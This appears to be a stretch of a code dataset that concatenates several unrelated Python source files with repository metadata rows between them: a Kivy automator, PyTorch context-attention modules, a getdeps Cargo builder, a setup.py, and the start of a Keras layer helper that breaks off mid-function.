# Run the full test suite when this module is executed directly.
if __name__ == "__main__":
    unittest.main()
| 30.193878 | 75 | 0.468233 |
3a951812ae9cbf0b5d1410cb7713acbb37c91294 | 371 | py | Python | ci_screen/automators/job_item.py | garyjohnson/ci_screen_2 | ea6a0ebd686148bb8977bd2d842e33e71fc2c3f0 | [
"MIT"
] | null | null | null | ci_screen/automators/job_item.py | garyjohnson/ci_screen_2 | ea6a0ebd686148bb8977bd2d842e33e71fc2c3f0 | [
"MIT"
] | null | null | null | ci_screen/automators/job_item.py | garyjohnson/ci_screen_2 | ea6a0ebd686148bb8977bd2d842e33e71fc2c3f0 | [
"MIT"
] | 1 | 2018-08-10T15:04:24.000Z | 2018-08-10T15:04:24.000Z | from kvaut.automator.custom_automator import CustomAutomator
class JobItemAutomator(CustomAutomator):
    """Automator matching a CI job item by project name and last build status."""

    def is_match(self, value=None, **custom_attributes):
        """Return True when *value* equals the target project's name and the
        supplied ``status`` attribute equals its last build status.

        A missing ``status`` attribute is never a match.
        """
        if 'status' not in custom_attributes:
            return False
        target_project = self._target.project
        name_matches = value == target_project.name
        status_matches = custom_attributes['status'] == target_project.last_build_status
        return name_matches and status_matches
| 30.916667 | 97 | 0.727763 |
3a95ae559435a30a68aba572eee4bea130369136 | 12,225 | py | Python | models/context.py | Hilbert70403/Infrared-Small-Target | 0b7bddc13ed3b2362735ea858af6e7d18d4374cd | [
"MIT"
] | 21 | 2021-11-08T08:06:36.000Z | 2022-03-26T14:22:35.000Z | models/context.py | Hilbert70403/Infrared-Small-Target | 0b7bddc13ed3b2362735ea858af6e7d18d4374cd | [
"MIT"
] | 4 | 2022-01-19T11:37:13.000Z | 2022-02-28T07:45:19.000Z | models/context.py | Hilbert70403/Infrared-Small-Target | 0b7bddc13ed3b2362735ea858af6e7d18d4374cd | [
"MIT"
] | 9 | 2021-11-15T09:24:41.000Z | 2022-03-24T08:11:00.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = ['NonLocalBlock', 'GCA_Channel', 'GCA_Element', 'AGCB_Element', 'AGCB_Patch', 'CPM']
class NonLocalBlock(nn.Module):
    """Self-attention (non-local) block with a residual connection.

    Computes ``out = gamma * attention(x) + x`` where the attention is the
    standard query/key/value dot-product over all spatial positions and
    ``gamma`` is a learnable scalar initialised to zero (so the block starts
    as an identity mapping).
    """

    def __init__(self, planes, reduce_ratio=8):
        super(NonLocalBlock, self).__init__()
        inter_planes = planes // reduce_ratio
        # 1x1 convs project to reduced query/key channels and full-rank values.
        self.query_conv = nn.Conv2d(planes, inter_planes, kernel_size=1)
        self.key_conv = nn.Conv2d(planes, inter_planes, kernel_size=1)
        self.value_conv = nn.Conv2d(planes, planes, kernel_size=1)
        self.gamma = nn.Parameter(torch.zeros(1))
        self.softmax = nn.Softmax(dim=-1)

    def forward(self, x):
        batch, _, height, width = x.size()
        hw = height * width
        # (B, HW, C') query against (B, C', HW) key -> (B, HW, HW) affinity.
        q = self.query_conv(x).contiguous().view(batch, -1, hw).permute(0, 2, 1)
        k = self.key_conv(x).contiguous().view(batch, -1, hw)
        attn = self.softmax(torch.bmm(q, k))
        # Aggregate values with the attention weights and restore the map shape.
        v = self.value_conv(x).contiguous().view(batch, -1, hw)
        aggregated = torch.bmm(v, attn.permute(0, 2, 1)).view(batch, -1, height, width)
        # Residual blend via the zero-initialised learnable weight.
        return self.gamma * aggregated + x
class GCA_Channel(nn.Module):
    # Global Context Attention over a coarse grid: the input is max-pooled to
    # a scale x scale map, refined with a non-local block, and squashed to
    # (0, 1) to produce one gate per (channel, grid cell).
    def __init__(self, planes, scale, reduce_ratio_nl, att_mode='origin'):
        # planes: channel count; scale: side length of the pooled grid;
        # reduce_ratio_nl: channel reduction inside the non-local block;
        # att_mode: 'origin' = sigmoid straight after the non-local block,
        #           'post'   = full-rank non-local then a bottleneck conv gate.
        super(GCA_Channel, self).__init__()
        assert att_mode in ['origin', 'post']
        self.att_mode = att_mode
        if att_mode == 'origin':
            self.pool = nn.AdaptiveMaxPool2d(scale)
            self.non_local_att = NonLocalBlock(planes, reduce_ratio=reduce_ratio_nl)
            self.sigmoid = nn.Sigmoid()
        elif att_mode == 'post':
            self.pool = nn.AdaptiveMaxPool2d(scale)
            self.non_local_att = NonLocalBlock(planes, reduce_ratio=1)
            # Bottleneck (C -> C/4 -> C) 1x1 convs ending in a sigmoid gate.
            self.conv_att = nn.Sequential(
                nn.Conv2d(planes, planes // 4, kernel_size=1),
                nn.BatchNorm2d(planes // 4),
                nn.ReLU(True),
                nn.Conv2d(planes // 4, planes, kernel_size=1),
                nn.BatchNorm2d(planes),
                nn.Sigmoid(),
            )
        else:
            raise NotImplementedError
    def forward(self, x):
        # Returns a gating tensor of shape (B, C, scale, scale) in (0, 1).
        if self.att_mode == 'origin':
            gca = self.pool(x)
            gca = self.non_local_att(gca)
            gca = self.sigmoid(gca)
        elif self.att_mode == 'post':
            gca = self.pool(x)
            gca = self.non_local_att(gca)
            gca = self.conv_att(gca)
        else:
            raise NotImplementedError
        return gca
class GCA_Element(nn.Module):
    # Element-wise variant of GCA: like GCA_Channel, but the coarse attention
    # grid is bilinearly upsampled back to the input resolution, yielding a
    # per-pixel (B, C, H, W) gate instead of a per-grid-cell one.
    def __init__(self, planes, scale, reduce_ratio_nl, att_mode='origin'):
        # Same parameters as GCA_Channel; in 'post' mode the sigmoid is kept
        # separate so it can be applied after upsampling in forward().
        super(GCA_Element, self).__init__()
        assert att_mode in ['origin', 'post']
        self.att_mode = att_mode
        if att_mode == 'origin':
            self.pool = nn.AdaptiveMaxPool2d(scale)
            self.non_local_att = NonLocalBlock(planes, reduce_ratio=reduce_ratio_nl)
            self.sigmoid = nn.Sigmoid()
        elif att_mode == 'post':
            self.pool = nn.AdaptiveMaxPool2d(scale)
            self.non_local_att = NonLocalBlock(planes, reduce_ratio=1)
            # Bottleneck conv gate without a trailing sigmoid (applied later).
            self.conv_att = nn.Sequential(
                nn.Conv2d(planes, planes // 4, kernel_size=1),
                nn.BatchNorm2d(planes // 4),
                nn.ReLU(True),
                nn.Conv2d(planes // 4, planes, kernel_size=1),
                nn.BatchNorm2d(planes),
            )
            self.sigmoid = nn.Sigmoid()
        else:
            raise NotImplementedError
    def forward(self, x):
        # Returns a per-pixel gate of shape (B, C, height, width) in (0, 1).
        batch_size, C, height, width = x.size()
        if self.att_mode == 'origin':
            gca = self.pool(x)
            gca = self.non_local_att(gca)
            # Upsample the coarse grid back to the input resolution.
            gca = F.interpolate(gca, [height, width], mode='bilinear', align_corners=True)
            gca = self.sigmoid(gca)
        elif self.att_mode == 'post':
            gca = self.pool(x)
            gca = self.non_local_att(gca)
            gca = self.conv_att(gca)
            gca = F.interpolate(gca, [height, width], mode='bilinear', align_corners=True)
            gca = self.sigmoid(gca)
        else:
            raise NotImplementedError
        return gca
class AGCB_Patch(nn.Module):
    # Attention-Guided Context Block, patch variant: the feature map is split
    # into a scale x scale grid of patches, each patch is refined by a shared
    # non-local block and multiplied by its scalar GCA_Channel gate, the
    # patches are stitched back together, and the result is fused with the
    # input through a conv + learnable residual.
    def __init__(self, planes, scale=2, reduce_ratio_nl=32, att_mode='origin'):
        super(AGCB_Patch, self).__init__()
        self.scale = scale
        self.non_local = NonLocalBlock(planes, reduce_ratio=reduce_ratio_nl)
        self.conv = nn.Sequential(
            nn.Conv2d(planes, planes, 3, 1, 1),
            nn.BatchNorm2d(planes),
            # nn.Dropout(0.1)
        )
        self.relu = nn.ReLU(True)
        self.attention = GCA_Channel(planes, scale, reduce_ratio_nl, att_mode=att_mode)
        # Zero-initialised residual weight: the block starts as ReLU(x).
        self.gamma = nn.Parameter(torch.zeros(1))
    def forward(self, x):
        ## long context
        gca = self.attention(x)
        ## single scale non local
        batch_size, C, height, width = x.size()
        # Compute patch boundaries; the last row/column absorbs any remainder
        # when height/width is not divisible by scale.
        local_x, local_y, attention_ind = [], [], []
        step_h, step_w = height // self.scale, width // self.scale
        for i in range(self.scale):
            for j in range(self.scale):
                start_x, start_y = i * step_h, j * step_w
                end_x, end_y = min(start_x + step_h, height), min(start_y + step_w, width)
                if i == (self.scale - 1):
                    end_x = height
                if j == (self.scale - 1):
                    end_y = width
                local_x += [start_x, end_x]
                local_y += [start_y, end_y]
                attention_ind += [i, j]
        index_cnt = 2 * self.scale * self.scale
        assert len(local_x) == index_cnt
        # Refine each patch and weight it by its grid cell's attention value.
        context_list = []
        for i in range(0, index_cnt, 2):
            block = x[:, :, local_x[i]:local_x[i+1], local_y[i]:local_y[i+1]]
            attention = gca[:, :, attention_ind[i], attention_ind[i+1]].view(batch_size, C, 1, 1)
            context_list.append(self.non_local(block) * attention)
        # Reassemble patches: concat each row along width, then rows along height.
        tmp = []
        for i in range(self.scale):
            row_tmp = []
            for j in range(self.scale):
                row_tmp.append(context_list[j + i * self.scale])
            tmp.append(torch.cat(row_tmp, 3))
        context = torch.cat(tmp, 2)
        context = self.conv(context)
        context = self.gamma * context + x
        context = self.relu(context)
        return context
class AGCB_Element(nn.Module):
    # Attention-Guided Context Block, element variant: patches are refined by
    # the shared non-local block WITHOUT per-patch scalar gating; instead the
    # stitched map is multiplied element-wise by the per-pixel GCA_Element
    # gate before the conv + learnable residual fusion.
    def __init__(self, planes, scale=2, reduce_ratio_nl=32, att_mode='origin'):
        super(AGCB_Element, self).__init__()
        self.scale = scale
        self.non_local = NonLocalBlock(planes, reduce_ratio=reduce_ratio_nl)
        self.conv = nn.Sequential(
            nn.Conv2d(planes, planes, 3, 1, 1),
            nn.BatchNorm2d(planes),
            # nn.Dropout(0.1)
        )
        self.relu = nn.ReLU(True)
        self.attention = GCA_Element(planes, scale, reduce_ratio_nl, att_mode=att_mode)
        # Zero-initialised residual weight: the block starts as ReLU(x).
        self.gamma = nn.Parameter(torch.zeros(1))
    def forward(self, x):
        ## long context
        gca = self.attention(x)
        ## single scale non local
        batch_size, C, height, width = x.size()
        # Patch boundaries; last row/column absorbs any division remainder.
        local_x, local_y, attention_ind = [], [], []
        step_h, step_w = height // self.scale, width // self.scale
        for i in range(self.scale):
            for j in range(self.scale):
                start_x, start_y = i * step_h, j * step_w
                end_x, end_y = min(start_x + step_h, height), min(start_y + step_w, width)
                if i == (self.scale - 1):
                    end_x = height
                if j == (self.scale - 1):
                    end_y = width
                local_x += [start_x, end_x]
                local_y += [start_y, end_y]
                attention_ind += [i, j]
        index_cnt = 2 * self.scale * self.scale
        assert len(local_x) == index_cnt
        context_list = []
        for i in range(0, index_cnt, 2):
            block = x[:, :, local_x[i]:local_x[i+1], local_y[i]:local_y[i+1]]
            # attention = gca[:, :, attention_ind[i], attention_ind[i+1]].view(batch_size, C, 1, 1)
            context_list.append(self.non_local(block))
        # Reassemble patches: concat each row along width, then rows along height.
        tmp = []
        for i in range(self.scale):
            row_tmp = []
            for j in range(self.scale):
                row_tmp.append(context_list[j + i * self.scale])
            tmp.append(torch.cat(row_tmp, 3))
        context = torch.cat(tmp, 2)
        # Element-wise gating with the full-resolution attention map.
        context = context * gca
        context = self.conv(context)
        context = self.gamma * context + x
        context = self.relu(context)
        return context
class AGCB_NoGCA(nn.Module):
    # Ablation of AGCB without any global context attention: per-patch
    # non-local refinement, stitch, conv, learnable residual, ReLU.
    # NOTE(review): not listed in this module's __all__ — presumably used for
    # ablation experiments only.
    def __init__(self, planes, scale=2, reduce_ratio_nl=32):
        super(AGCB_NoGCA, self).__init__()
        self.scale = scale
        self.non_local = NonLocalBlock(planes, reduce_ratio=reduce_ratio_nl)
        self.conv = nn.Sequential(
            nn.Conv2d(planes, planes, 3, 1, 1),
            nn.BatchNorm2d(planes),
            # nn.Dropout(0.1)
        )
        self.relu = nn.ReLU(True)
        # Zero-initialised residual weight: the block starts as ReLU(x).
        self.gamma = nn.Parameter(torch.zeros(1))
    def forward(self, x):
        ## single scale non local
        batch_size, C, height, width = x.size()
        # Patch boundaries; last row/column absorbs any division remainder.
        local_x, local_y, attention_ind = [], [], []
        step_h, step_w = height // self.scale, width // self.scale
        for i in range(self.scale):
            for j in range(self.scale):
                start_x, start_y = i * step_h, j * step_w
                end_x, end_y = min(start_x + step_h, height), min(start_y + step_w, width)
                if i == (self.scale - 1):
                    end_x = height
                if j == (self.scale - 1):
                    end_y = width
                local_x += [start_x, end_x]
                local_y += [start_y, end_y]
                attention_ind += [i, j]
        index_cnt = 2 * self.scale * self.scale
        assert len(local_x) == index_cnt
        context_list = []
        for i in range(0, index_cnt, 2):
            block = x[:, :, local_x[i]:local_x[i+1], local_y[i]:local_y[i+1]]
            context_list.append(self.non_local(block))
        # Reassemble patches: concat each row along width, then rows along height.
        tmp = []
        for i in range(self.scale):
            row_tmp = []
            for j in range(self.scale):
                row_tmp.append(context_list[j + i * self.scale])
            tmp.append(torch.cat(row_tmp, 3))
        context = torch.cat(tmp, 2)
        context = self.conv(context)
        context = self.gamma * context + x
        context = self.relu(context)
        return context
class CPM(nn.Module):
    # Context Pyramid Module: reduce channels with a 1x1 conv, run parallel
    # AGCB branches at several patch scales, concatenate the branches with
    # the reduced input, and fuse back to `planes` channels with a 1x1 conv.
    def __init__(self, planes, block_type, scales=(3,5,6,10), reduce_ratios=(4,8), att_mode='origin'):
        # block_type selects the AGCB variant ('patch' or 'element');
        # reduce_ratios = (channel reduction before the pyramid,
        #                  non-local reduction inside each AGCB).
        super(CPM, self).__init__()
        assert block_type in ['patch', 'element']
        assert att_mode in ['origin', 'post']
        inter_planes = planes // reduce_ratios[0]
        self.conv1 = nn.Sequential(
            nn.Conv2d(planes, inter_planes, kernel_size=1),
            nn.BatchNorm2d(inter_planes),
            nn.ReLU(True),
        )
        if block_type == 'patch':
            self.scale_list = nn.ModuleList(
                [AGCB_Patch(inter_planes, scale=scale, reduce_ratio_nl=reduce_ratios[1], att_mode=att_mode)
                 for scale in scales])
        elif block_type == 'element':
            self.scale_list = nn.ModuleList(
                [AGCB_Element(inter_planes, scale=scale, reduce_ratio_nl=reduce_ratios[1], att_mode=att_mode)
                 for scale in scales])
        else:
            raise NotImplementedError
        # One branch per scale plus the reduced input itself.
        channels = inter_planes * (len(scales) + 1)
        self.conv2 = nn.Sequential(
            nn.Conv2d(channels, planes, 1),
            nn.BatchNorm2d(planes),
            nn.ReLU(True),
        )
    def forward(self, x):
        reduced = self.conv1(x)
        # Collect the output of every pyramid branch.
        blocks = []
        for i in range(len(self.scale_list)):
            blocks.append(self.scale_list[i](reduced))
        out = torch.cat(blocks, 1)
        out = torch.cat((reduced, out), 1)
        out = self.conv2(out)
        return out
| 35.641399 | 109 | 0.558937 |
3a96f177bdadd6a1d79e415e623de1950e19535a | 17,315 | py | Python | build/fbcode_builder/getdeps/cargo.py | dmitryvinn/watchman | 668d3536031acd9b65950c29d6e956bb42b972bb | [
"MIT"
] | null | null | null | build/fbcode_builder/getdeps/cargo.py | dmitryvinn/watchman | 668d3536031acd9b65950c29d6e956bb42b972bb | [
"MIT"
] | null | null | null | build/fbcode_builder/getdeps/cargo.py | dmitryvinn/watchman | 668d3536031acd9b65950c29d6e956bb42b972bb | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import re
import shutil
from .builder import BuilderBase
class CargoBuilder(BuilderBase):
def __init__(
self,
build_opts,
ctx,
manifest,
src_dir,
build_dir,
inst_dir,
build_doc,
workspace_dir,
manifests_to_build,
loader,
cargo_config_file,
) -> None:
super(CargoBuilder, self).__init__(
build_opts, ctx, manifest, src_dir, build_dir, inst_dir
)
self.build_doc = build_doc
self.ws_dir = workspace_dir
self.manifests_to_build = manifests_to_build and manifests_to_build.split(",")
self.loader = loader
self.cargo_config_file_subdir = cargo_config_file
def run_cargo(self, install_dirs, operation, args=None) -> None:
args = args or []
env = self._compute_env(install_dirs)
# Enable using nightly features with stable compiler
env["RUSTC_BOOTSTRAP"] = "1"
env["LIBZ_SYS_STATIC"] = "1"
cmd = [
"cargo",
operation,
"--workspace",
"-j%s" % self.num_jobs,
] + args
self._run_cmd(cmd, cwd=self.workspace_dir(), env=env)
def build_source_dir(self):
return os.path.join(self.build_dir, "source")
def workspace_dir(self):
return os.path.join(self.build_source_dir(), self.ws_dir or "")
def manifest_dir(self, manifest):
return os.path.join(self.build_source_dir(), manifest)
def recreate_dir(self, src, dst) -> None:
if os.path.isdir(dst):
shutil.rmtree(dst)
shutil.copytree(src, dst)
def cargo_config_file(self):
build_source_dir = self.build_dir
if self.cargo_config_file_subdir:
return os.path.join(build_source_dir, self.cargo_config_file_subdir)
else:
return os.path.join(build_source_dir, ".cargo", "config")
def _create_cargo_config(self):
cargo_config_file = self.cargo_config_file()
cargo_config_dir = os.path.dirname(cargo_config_file)
if not os.path.isdir(cargo_config_dir):
os.mkdir(cargo_config_dir)
print(f"Writing cargo config for {self.manifest.name} to {cargo_config_file}")
with open(cargo_config_file, "w+") as f:
f.write(
"""\
# Generated by getdeps.py
[build]
target-dir = '''{}'''
[net]
git-fetch-with-cli = true
[profile.dev]
debug = false
incremental = false
""".format(
self.build_dir.replace("\\", "\\\\")
)
)
# Point to vendored sources from getdeps manifests
dep_to_git = self._resolve_dep_to_git()
for _dep, git_conf in dep_to_git.items():
if "cargo_vendored_sources" in git_conf:
with open(cargo_config_file, "a") as f:
vendored_dir = git_conf["cargo_vendored_sources"].replace(
"\\", "\\\\"
)
f.write(
f"""
[source."{git_conf["repo_url"]}"]
directory = "{vendored_dir}"
"""
)
# Point to vendored crates.io if possible
try:
from .facebook.rust import vendored_crates
vendored_crates(self.build_opts, cargo_config_file)
except ImportError:
# This FB internal module isn't shippped to github,
# so just rely on cargo downloading crates on it's own
pass
return dep_to_git
def _prepare(self, install_dirs, reconfigure):
build_source_dir = self.build_source_dir()
self.recreate_dir(self.src_dir, build_source_dir)
dep_to_git = self._create_cargo_config()
if self.ws_dir is not None:
self._patchup_workspace(dep_to_git)
def _build(self, install_dirs, reconfigure) -> None:
# _prepare has been run already. Actually do the build
build_source_dir = self.build_source_dir()
if self.manifests_to_build is None:
self.run_cargo(
install_dirs,
"build",
["--out-dir", os.path.join(self.inst_dir, "bin"), "-Zunstable-options"],
)
else:
for manifest in self.manifests_to_build:
self.run_cargo(
install_dirs,
"build",
[
"--out-dir",
os.path.join(self.inst_dir, "bin"),
"-Zunstable-options",
"--manifest-path",
self.manifest_dir(manifest),
],
)
self.recreate_dir(build_source_dir, os.path.join(self.inst_dir, "source"))
def run_tests(
self, install_dirs, schedule_type, owner, test_filter, retry, no_testpilot
) -> None:
if test_filter:
args = ["--", test_filter]
else:
args = []
if self.manifests_to_build is None:
self.run_cargo(install_dirs, "test", args)
if self.build_doc:
self.run_cargo(install_dirs, "doc", ["--no-deps"])
else:
for manifest in self.manifests_to_build:
margs = ["--manifest-path", self.manifest_dir(manifest)]
self.run_cargo(install_dirs, "test", args + margs)
if self.build_doc:
self.run_cargo(install_dirs, "doc", ["--no-deps"] + margs)
def _patchup_workspace(self, dep_to_git) -> None:
"""
This method makes some assumptions about the state of the project and
its cargo dependendies:
1. Crates from cargo dependencies can be extracted from Cargo.toml files
using _extract_crates function. It is using a heuristic so check its
code to understand how it is done.
2. The extracted cargo dependencies crates can be found in the
dependency's install dir using _resolve_crate_to_path function
which again is using a heuristic.
Notice that many things might go wrong here. E.g. if someone depends
on another getdeps crate by writing in their Cargo.toml file:
my-rename-of-crate = { package = "crate", git = "..." }
they can count themselves lucky because the code will raise an
Exception. There migh be more cases where the code will silently pass
producing bad results.
"""
workspace_dir = self.workspace_dir()
config = self._resolve_config(dep_to_git)
if config:
patch_cargo = os.path.join(workspace_dir, "Cargo.toml")
print(f"writing patch to {patch_cargo}")
with open(patch_cargo, "r+") as f:
manifest_content = f.read()
if "[package]" not in manifest_content:
# A fake manifest has to be crated to change the virtual
# manifest into a non-virtual. The virtual manifests are limited
# in many ways and the inability to define patches on them is
# one. Check https://github.com/rust-lang/cargo/issues/4934 to
# see if it is resolved.
null_file = "/dev/null"
if self.build_opts.is_windows():
null_file = "nul"
f.write(
f"""
[package]
name = "fake_manifest_of_{self.manifest.name}"
version = "0.0.0"
[lib]
path = "{null_file}"
"""
)
else:
f.write("\n")
f.write(config)
def _resolve_config(self, dep_to_git) -> str:
"""
Returns a configuration to be put inside root Cargo.toml file which
patches the dependencies git code with local getdeps versions.
See https://doc.rust-lang.org/cargo/reference/manifest.html#the-patch-section
"""
dep_to_crates = self._resolve_dep_to_crates(self.build_source_dir(), dep_to_git)
config = []
git_url_to_crates_and_paths = {}
for dep_name in sorted(dep_to_git.keys()):
git_conf = dep_to_git[dep_name]
req_crates = sorted(dep_to_crates.get(dep_name, []))
if not req_crates:
continue # nothing to patch, move along
git_url = git_conf.get("repo_url", None)
crate_source_map = git_conf["crate_source_map"]
if git_url and crate_source_map:
crates_to_patch_path = git_url_to_crates_and_paths.get(git_url, {})
for c in req_crates:
if c in crate_source_map and c not in crates_to_patch_path:
crates_to_patch_path[c] = crate_source_map[c]
print(
f"{self.manifest.name}: Patching crate {c} via virtual manifest in {self.workspace_dir()}"
)
if crates_to_patch_path:
git_url_to_crates_and_paths[git_url] = crates_to_patch_path
for git_url, crates_to_patch_path in git_url_to_crates_and_paths.items():
crates_patches = [
'{} = {{ path = "{}" }}'.format(
crate,
crates_to_patch_path[crate].replace("\\", "\\\\"),
)
for crate in sorted(crates_to_patch_path.keys())
]
config.append(f'\n[patch."{git_url}"]\n' + "\n".join(crates_patches))
return "\n".join(config)
def _resolve_dep_to_git(self):
"""
For each direct dependency of the currently build manifest check if it
is also cargo-builded and if yes then extract it's git configs and
install dir
"""
dependencies = self.manifest.get_dependencies(self.ctx)
if not dependencies:
return []
dep_to_git = {}
for dep in dependencies:
dep_manifest = self.loader.load_manifest(dep)
dep_builder = dep_manifest.get("build", "builder", ctx=self.ctx)
dep_cargo_conf = dep_manifest.get_section_as_dict("cargo", self.ctx)
dep_crate_map = dep_manifest.get_section_as_dict("crate.pathmap", self.ctx)
if (
not (dep_crate_map or dep_cargo_conf)
and dep_builder not in ["cargo"]
or dep == "rust"
):
# This dependency has no cargo rust content so ignore it.
# The "rust" dependency is an exception since it contains the
# toolchain.
continue
git_conf = dep_manifest.get_section_as_dict("git", self.ctx)
if dep != "rust" and "repo_url" not in git_conf:
raise Exception(
f"{dep}: A cargo dependency requires git.repo_url to be defined."
)
if dep_builder == "cargo":
dep_source_dir = self.loader.get_project_install_dir(dep_manifest)
dep_source_dir = os.path.join(dep_source_dir, "source")
else:
fetcher = self.loader.create_fetcher(dep_manifest)
dep_source_dir = fetcher.get_src_dir()
crate_source_map = {}
if dep_crate_map:
for (crate, subpath) in dep_crate_map.items():
if crate not in crate_source_map:
if self.build_opts.is_windows():
subpath = subpath.replace("/", "\\")
crate_path = os.path.join(dep_source_dir, subpath)
print(
f"{self.manifest.name}: Mapped crate {crate} to dep {dep} dir {crate_path}"
)
crate_source_map[crate] = crate_path
elif dep_cargo_conf:
# We don't know what crates are defined buy the dep, look for them
search_pattern = re.compile('\\[package\\]\nname = "(.*)"')
for crate_root, _, files in os.walk(dep_source_dir):
if "Cargo.toml" in files:
with open(os.path.join(crate_root, "Cargo.toml"), "r") as f:
content = f.read()
match = search_pattern.search(content)
if match:
crate = match.group(1)
if crate:
print(
f"{self.manifest.name}: Discovered crate {crate} in dep {dep} dir {crate_root}"
)
crate_source_map[crate] = crate_root
git_conf["crate_source_map"] = crate_source_map
if not dep_crate_map and dep_cargo_conf:
dep_cargo_dir = self.loader.get_project_build_dir(dep_manifest)
dep_cargo_dir = os.path.join(dep_cargo_dir, "source")
dep_ws_dir = dep_cargo_conf.get("workspace_dir", None)
if dep_ws_dir:
dep_cargo_dir = os.path.join(dep_cargo_dir, dep_ws_dir)
git_conf["cargo_vendored_sources"] = dep_cargo_dir
dep_to_git[dep] = git_conf
return dep_to_git
def _resolve_dep_to_crates(self, build_source_dir, dep_to_git):
"""
This function traverse the build_source_dir in search of Cargo.toml
files, extracts the crate names from them using _extract_crates
function and returns a merged result containing crate names per
dependency name from all Cargo.toml files in the project.
"""
if not dep_to_git:
return {} # no deps, so don't waste time traversing files
dep_to_crates = {}
# First populate explicit crate paths from depedencies
for name, git_conf in dep_to_git.items():
crates = git_conf["crate_source_map"].keys()
if crates:
dep_to_crates.setdefault(name, set()).update(crates)
# Now find from Cargo.tomls
for root, _, files in os.walk(build_source_dir):
for f in files:
if f == "Cargo.toml":
more_dep_to_crates = CargoBuilder._extract_crates_used(
os.path.join(root, f), dep_to_git
)
for dep_name, crates in more_dep_to_crates.items():
existing_crates = dep_to_crates.get(dep_name, set())
for c in crates:
if c not in existing_crates:
print(
f"Patch {self.manifest.name} uses {dep_name} crate {crates}"
)
existing_crates.insert(c)
dep_to_crates.setdefault(name, set()).update(existing_crates)
return dep_to_crates
    @staticmethod
    def _extract_crates_used(cargo_toml_file, dep_to_git):
        """
        Read the given Cargo.toml and return a dict of dependency name ->
        set of crate names referenced from that dependency's git URL.
        The extraction is a line-based heuristic (no real TOML parsing), so
        it might be incorrect for unusually formatted manifests.
        """
        deps_to_crates = {}
        with open(cargo_toml_file, "r") as f:
            for line in f.readlines():
                if line.startswith("#") or "git = " not in line:
                    continue  # filter out commented lines and ones without git deps
                for dep_name, conf in dep_to_git.items():
                    # Only redirect deps that point to git URLS
                    if 'git = "{}"'.format(conf["repo_url"]) in line:
                        pkg_template = ' package = "'
                        if pkg_template in line:
                            # `alias = { package = "real_name", git = ... }`:
                            # the crate name is the quoted package value.
                            crate_name, _, _ = line.partition(pkg_template)[
                                2
                            ].partition('"')
                        else:
                            # Plain `crate = { git = ... }`: the crate name is
                            # everything before the first '='.
                            crate_name, _, _ = line.partition("=")
                        deps_to_crates.setdefault(dep_name, set()).add(
                            crate_name.strip()
                        )
        return deps_to_crates
    def _resolve_crate_to_path(self, crate, crate_source_map):
        """
        Tries to find <crate> in source_dir by searching a [package]
        keyword followed by name = "<crate>" in any Cargo.toml below the
        mapped source directories. Returns the directory containing the
        matching Cargo.toml, or raises if the crate cannot be located.
        """
        search_pattern = '[package]\nname = "{}"'.format(crate)
        for (_crate, crate_source_dir) in crate_source_map.items():
            for crate_root, _, files in os.walk(crate_source_dir):
                if "Cargo.toml" in files:
                    with open(os.path.join(crate_root, "Cargo.toml"), "r") as f:
                        content = f.read()
                        if search_pattern in content:
                            return crate_root
        raise Exception(
            f"{self.manifest.name}: Failed to find dep crate {crate} in paths {crate_source_map}"
        )
| 40.081019 | 119 | 0.551372 |
3a97bee3b980525a2f4756251f4575984854cc03 | 500 | py | Python | setup.py | EricCWWong/GSimulator | aee7dc81d2a709beb94c02ffc8a288cd7ba06747 | [
"MIT"
] | null | null | null | setup.py | EricCWWong/GSimulator | aee7dc81d2a709beb94c02ffc8a288cd7ba06747 | [
"MIT"
] | 7 | 2020-02-01T02:19:49.000Z | 2020-07-10T12:49:28.000Z | setup.py | EricCWWong/GSimulator | aee7dc81d2a709beb94c02ffc8a288cd7ba06747 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(
name="GSimulator",
packages=find_packages(exclude=['*test']),
version="0.1.1",
author="Eric Wong",
description='This package allows user to \
simulate conductance of quantum wires',
author_email='c.wing.wong.19@ucl.ac.uk',
install_requires=['numpy', 'matplotlib', 'prettytable', 'qutip', 'tqdm'],
entry_points={
'console_scripts': [
'gsimulator = GSimulator.command:process'
]}
)
| 29.411765 | 77 | 0.644 |
3a98425fabf2f4efae0310710f9d76f3fbba768a | 3,995 | py | Python | donn/layers.py | sharan-amutharasu/DONN | c14557e8ef57f3e1c1b73c1fa98cb6ba19a82904 | [
"MIT"
] | 3 | 2018-08-17T05:31:25.000Z | 2020-02-13T19:43:02.000Z | tests/donn/layers.py | sharan-amutharasu/DONN | c14557e8ef57f3e1c1b73c1fa98cb6ba19a82904 | [
"MIT"
] | 1 | 2018-11-19T06:16:50.000Z | 2018-11-19T06:17:53.000Z | tests/donn/layers.py | sharan-amutharasu/DONN | c14557e8ef57f3e1c1b73c1fa98cb6ba19a82904 | [
"MIT"
] | 2 | 2018-12-06T05:01:07.000Z | 2018-12-06T11:59:47.000Z |
# coding: utf-8
# In[4]:
from keras.layers import Activation, Dense, Dropout
from keras.layers.advanced_activations import LeakyReLU, PReLU, ThresholdedReLU, ELU
from keras import regularizers
# In[5]:
def get_activation_layer(activation):
    """Build a Keras activation layer from its name.

    The advanced activations have dedicated layer classes; any other name is
    handed unchanged to the generic ``Activation`` wrapper.
    """
    advanced_layers = {
        'ELU': ELU,
        'LeakyReLU': LeakyReLU,
        'ThresholdedReLU': ThresholdedReLU,
        'PReLU': PReLU,
    }
    factory = advanced_layers.get(activation)
    if factory is not None:
        return factory()
    return Activation(activation)
# In[4]:
class Layer(object):
    """
    Layer object for adding different types of layers to a Keras model.
    Supported layer_type values: "input", "hidden", "activation", "dropout",
    "output" (an "LSTM" variant exists below but is commented out).
    """
    def __init__(self, layer_type):
        self.layer_type = layer_type
        # Dense-style layers share the same initializer and L2 regularizer.
        if self.layer_type in ["hidden", "input", "output"]:
            self.kernel_initializer='normal'
            self.kernel_regularizer=regularizers.l2(0.01)
    def add_to_model(self, model, params, count, input_dim=None, output_layer_units=None, mode=None, layers=None):
        """
        Append this layer to `model` and return the model.
        `params` supplies per-layer settings keyed by
        "<layer_type>_layer_<count>_units" plus activation/dropout options;
        `input_dim` is only used by the first Dense layer; `mode` selects
        the output head ("classifier" or "regressor").
        NOTE(review): `layers` is only referenced by the commented-out LSTM
        branch below and is otherwise unused.
        """
        ## Input Layer
        if self.layer_type == "input":
            units = params[str(self.layer_type + "_layer_" + str(count) + "_units")]
            if input_dim is not None:
